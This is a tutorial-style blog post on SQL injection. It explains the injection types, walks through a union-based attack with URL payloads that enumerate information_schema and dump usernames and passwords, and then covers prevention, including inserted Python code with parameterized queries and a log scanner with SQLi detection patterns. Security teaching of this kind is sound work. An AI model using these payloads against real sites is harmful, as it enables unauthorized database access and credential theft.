SQL INJECTION

Shubham Hatej
8 min read · Jan 2, 2021
YOUR DATA IS BEING TARGETED !!

Hello everyone, in this blog we will discuss SQL Injection, a very critical vulnerability that has held the no. 1 position in the OWASP (Open Web Application Security Project) Top 10 since 2010.

SQL Injection:- SQL injection allows an attacker to interfere with the queries that an application makes to its database. It generally lets the attacker view data they are not normally able to retrieve, including credentials that are not meant to be publicly visible. In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure by achieving RCE (Remote Code Execution).

Impact of an SQL injection attack:- A successful SQL injection attack can result in unauthorized access to sensitive data such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines.

Types of SQL Injections

The three main types of SQL Injections are:-

1. In-Band SQL Injection (Classic SQL Injection).

2. Inferential SQL Injection (Blind SQL Injection).

3. Out-of-band SQL Injection.

1. In-band SQL Injection

In-band SQL Injection is the most common and easiest-to-exploit form of SQL Injection. It occurs when an attacker is able to use the same communication channel both to launch the attack and to gather the results.

The two most common types of In-band SQL Injection are Error-based SQL Injection and Union-based SQL Injection.

  • Error-Based SQL Injection:- Error-based SQL Injection is a technique that relies on error messages thrown by the database server to obtain information about the structure of the database. From these error messages we can learn the database structure: tables, columns, etc.
  • Union-based SQLi:- Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result, which is then returned as part of the HTTP response.

2. Inferential SQL Injection (Blind SQLi)

Inferential SQL Injection, unlike in-band SQLi, may take longer for an attacker to exploit; however, it is just as dangerous as any other form of SQL Injection. In an inferential SQLi attack, no data is actually transferred via the web application, and the attacker cannot see the result of the attack directly. Instead, the attacker reconstructs the database structure by sending payloads and observing the web application's response and the resulting behavior of the database server.

The two types of inferential SQL Injection are boolean-based blind SQLi and time-based blind SQLi.

Boolean-based Blind SQL Injection

Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

Time-based Blind SQL Injection

Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

3. Out-of-band SQL Injection

Out-of-band SQL Injection is not very common, mostly because it depends on features being enabled on the database server used by the web application. The attacker therefore has to craft payloads according to which of those features are available.

The possible implementations of SQL Injection, with payloads

Step 1 - First, we have to find a value that does not exist for the parameter in the URL by changing its value to something like -1 or 2234599 or 1 2 3 4 5 that gives you no output; this is done just by manipulating the parameter values.

Step 2 - Break the query to bring out an error, so that we can insert our own query, which later digs out the information we need.

We can break the query by using the following:

Single quote -‘
Double quote -“
Backward slash -\
Bracket “Closing” -)
Single quote with closing bracket -‘)
Double quote with closing bracket -“)

And sometimes we don’t need to break the query.

Step 3 - Joining the query

In order to execute our query, we also need to join the query that we broke earlier in Step 2.

We can join the query by using the following:

— +
— space or — %20 (%20 is space)
# or %23 (here %23 is the value of hash)
1' or ‘1
1’ or 1=’1
‘) — + (if code contains () brackets)

Step 4 - Find out the number of columns using ORDER BY

We can find the number of columns by using the ORDER BY clause in the URL.

To get the number of columns, we use ORDER BY and insert numbers in ascending order (1, 2, 3, 4...). Whenever it gives us an error like "Unknown column in order clause", the number we inserted in the ORDER BY is one more than the number of columns, so the last number that does not give an error is the number of columns present in the table.

The query would look something like this:

order by 1
order by 2
order by 3

and the URL would look something like:

?id=1' order by 1 — +

?id=1' order by 2 — +

Step 5 - Find where the SQL is showing its output using UNION

This step is important because it decides where our payload is going to be. The UNION ALL operator is used to combine the result sets of two or more SELECT statements.

Query

UNION ALL select 1,2,3… (depends on the no. of columns we found)

URL

?id=1' union all select database(),2,3 — +
Here our payload is database(), which gives us the name of the database. If this doesn't show us any output, then we just have to change the position of our payload.

Something like this:

?id=1' union all select 1,database(),3 — +

or

?id=1' union all select 1,2,database() — +

To get information about the database, we can use the following in the place of our payload:

database() (Database name)
Version() or @@version (MySQL version)
current_user (Current user name)

Step 6 - Get table names from the database

To get the table names we have to use the information schema. The information schema is a database that provides access to details about the databases and their objects (tables, columns, etc.) stored on the server.

Now our query would look something like this:

union all select 1,table_name,3 from information_schema.tables
The position where we put 2 in our query is the one printed on the screen, so that position becomes our payload injector.

union all select 1,table_name,3 from information_schema.tables — +
To get all table names at once, just comment out everything after our query by adding "— +" to the end.

union all select 1,table_name,3 from information_schema.tables limit 0,1 — +
From here we can control the output by using LIMIT, like 0,1 1,1 1,2.

union all select 1,table_name,3 from information_schema.tables where table_schema=’Database name’ limit 0,1 — +
Here we are retrieving data according to the name of the database which we found earlier in Step 5.

Either you give the name of the database or call the function database(); this will get you the names of the tables.

?id=-1' union all select table_name,2 from information_schema.tables where table_schema=database() — +
Using the WHERE clause we can filter the output.

or

You can directly call your table associated with that database like this:

?id=-1' union all select table_name,2 from information_schema.tables where table_schema=’database name’ — +

Step 7 - Get all table names from the database one by one

We can use group_concat() here.

URL

?id=-1' union all select group_concat(table_name),2 from information_schema.tables where table_schema=database() limit 0,1 — +

Find out which table seems important to you then get data from that table like emails or passwords or usernames.

Step 8 - Get all table names from the database at once

In order to get all the table names at once we can use the following query:

union all select group_concat(table_name),2 from information_schema.tables where table_schema=database()

union all select group_concat(table_name),2 from information_schema.tables where table_schema=’Database name’

and the URL will look something like:

?id=-1' union all select group_concat(table_name),2 from information_schema.tables where table_schema=’Database name’ — +

Step 9 - Find the names of the columns

Get all column names from the table at once by using this query.

Query

union all select group_concat(column_name),2,3 from information_schema.columns where table_name=’table name’

URL

?id=-1' union all select group_concat(column_name),2,3 from information_schema.columns where table_name=’table name’ — +

In the previous Step 8 we got the names of the tables; that's why we are using the table name in this query.

Step 10 - Get all data from the columns at once

We have the table names and column names, so now we can retrieve the data.

Query

union all select group_concat(username),group_concat(password),3 from users where table_schema=database()

URL

?id=-1' union all select group_concat(username),group_concat(password),3 from users where table_schema=database() — +

This will give all the data at once. To get it one by one, use the following query:

union all select id, username, password from users
Here id, username, and password are column names, and users is the table name.

And from here we can dump the data contained in the database. Similarly, we can use boolean-based and time-based SQL Injections, which are somewhat more complex and time-consuming; we have to use them because not all databases are highly vulnerable.

NOTE:- ATTACKING ON ANY SITE WITHOUT PERMISSION IS ILLEGAL

SQL injection prevention techniques

Input validation

Input validation verifies whether or not the input submitted by a user is of an allowed type: it makes sure the input has the accepted type, length, format, and so on. Only values that pass validation are processed.

Parametrized queries

Parameterized queries are a means of pre-compiling an SQL statement so that you can then supply the parameters in order for the statement to be executed. This method makes it possible for the database to recognize the code and distinguish it from input data.
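As an added illustration of the two points above (input validation and parameterized queries), here is a small Python example that is not part of the original post: the same lookup written with string concatenation, with a bound parameter, and with an allowlist check in front. The users table, its rows and the function names are constructed for the demo.

```python
import re
import sqlite3

# Constructed demo schema: a hypothetical "users" table with two rows.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def lookup_vulnerable(conn, user_id: str):
    # The input is spliced into the SQL text, so a quote in it closes the
    # string literal and the remainder is parsed as SQL (the "break the
    # query" step described above).
    sql = "SELECT username FROM users WHERE id = '" + user_id + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn, user_id: str):
    # The statement is compiled with a placeholder; the input is bound as a
    # value afterwards and is never parsed as SQL, so a quote is just a quote.
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]

# Allowlist validation: an id is 1 to 10 ASCII digits, nothing else.
ID_RE = re.compile(r"[0-9]{1,10}")

def validate_id(user_id: str) -> int:
    # Reject anything that is not a plain integer before it reaches the
    # database layer; this is the "accepted type, length, format" check.
    if not ID_RE.fullmatch(user_id):
        raise ValueError("id must be a positive integer")
    return int(user_id)

def lookup_defended(conn, user_id: str):
    # Defence in depth: validate first, then bind the value as a parameter.
    return lookup_parameterized(conn, str(validate_id(user_id)))
```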

Escaping

Always use the character-escaping functions provided by your database management system (DBMS) on user-supplied input, so that the DBMS never confuses that input with the SQL statement written by the developer.

Avoiding administrative privileges

Don't connect your application to the database using an account with root access. This should be done only if absolutely needed, since attackers could otherwise gain access to the whole system. Even non-administrative accounts on the server can place an application at risk, even more so if the database server is used by multiple applications and databases.

Web application firewall

One of the best practices to identify SQL injection attacks is having a web application firewall (WAF). A WAF operating in front of the web servers monitors the traffic which goes in and out of the web servers and identifies patterns that constitute a threat. Essentially, it is a barrier put between the web application and the Internet.
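As an added example that is not from the original post, the following Python snippet shows the kind of pattern matching a WAF or log monitor does over decoded request URLs, keyed to the probing sequence walked through above (a stray quote causing a server error, ORDER BY counting, UNION SELECT, information_schema lookups, comment terminators). The access-log lines, paths and IP addresses are constructed.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probing sequence described in the post; matched on the
# URL-decoded request so %20 / '+' encoding does not hide them.
SQLI_PATTERNS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "info_schema": re.compile(r"\binformation_schema\.", re.I),
    "tautology": re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+", re.I),
    "comment_terminator": re.compile(r"--|#"),
}
# Minimal common-log-format parser: client IP, request URL and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Constructed sample access log (hypothetical paths and addresses).
SAMPLE_LOG = """\
10.0.0.5 - - [02/Jan/2021:10:00:01 +0000] "GET /product.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [02/Jan/2021:10:00:02 +0000] "GET /product.php?id=1' HTTP/1.1" 500 88
10.0.0.5 - - [02/Jan/2021:10:00:03 +0000] "GET /product.php?id=1'%20order%20by%203--+ HTTP/1.1" 200 512
10.0.0.5 - - [02/Jan/2021:10:00:04 +0000] "GET /product.php?id=-1'%20union%20all%20select%201,database(),3--+ HTTP/1.1" 200 530
10.0.0.5 - - [02/Jan/2021:10:00:05 +0000] "GET /product.php?id=-1'%20union%20all%20select%20group_concat(table_name),2,3%20from%20information_schema.tables%20where%20table_schema=database()--+ HTTP/1.1" 200 700
10.0.0.9 - - [02/Jan/2021:10:00:06 +0000] "GET /search.php?q=order+status HTTP/1.1" 200 300
"""

def scan_log(text):
    """Return (ip, raw_url, [signature names]) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = unquote_plus(m.group("url"))  # decode %xx and '+' before matching
        hits = [name for name, pat in SQLI_PATTERNS.items() if pat.search(url)]
        # A lone quote followed by a server error is the "break the query" step.
        if "'" in url and m.group("status").startswith("5"):
            hits.append("quote_caused_error")
        if hits:
            findings.append((m.group("ip"), m.group("url"), hits))
    return findings

def attacker_ips(text):
    """IPs showing more than one distinct signature: a probing sequence, not noise."""
    sigs = {}
    for ip, _, hits in scan_log(text):
        sigs.setdefault(ip, set()).update(hits)
    return sorted(ip for ip, s in sigs.items() if len(s) > 1)
```

The last line of the sample ("order status" in a search box) is deliberately benign and is not flagged, which is the false-positive check a rule like "order_by_probe" needs.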

Prevention techniques such as input validation, parameterized queries, and escaping work well against varying attack vectors. However, because of the large variation in the patterns of SQL injection attacks, they are often unable to protect databases.

THANK YOU FOR READING THE BLOG.

AND WHILE READING IF YOU FIND THIS BLOG INFORMATIONAL AND USEFUL THEN FOLLOWING ME ON TWITTER AND LINKEDIN WILL BE SPECTACULAR.

TWITTER:-https://twitter.com/shubham_hatej

LINKEDIN:-https://www.linkedin.com/in/shubham-hatej-427307169/
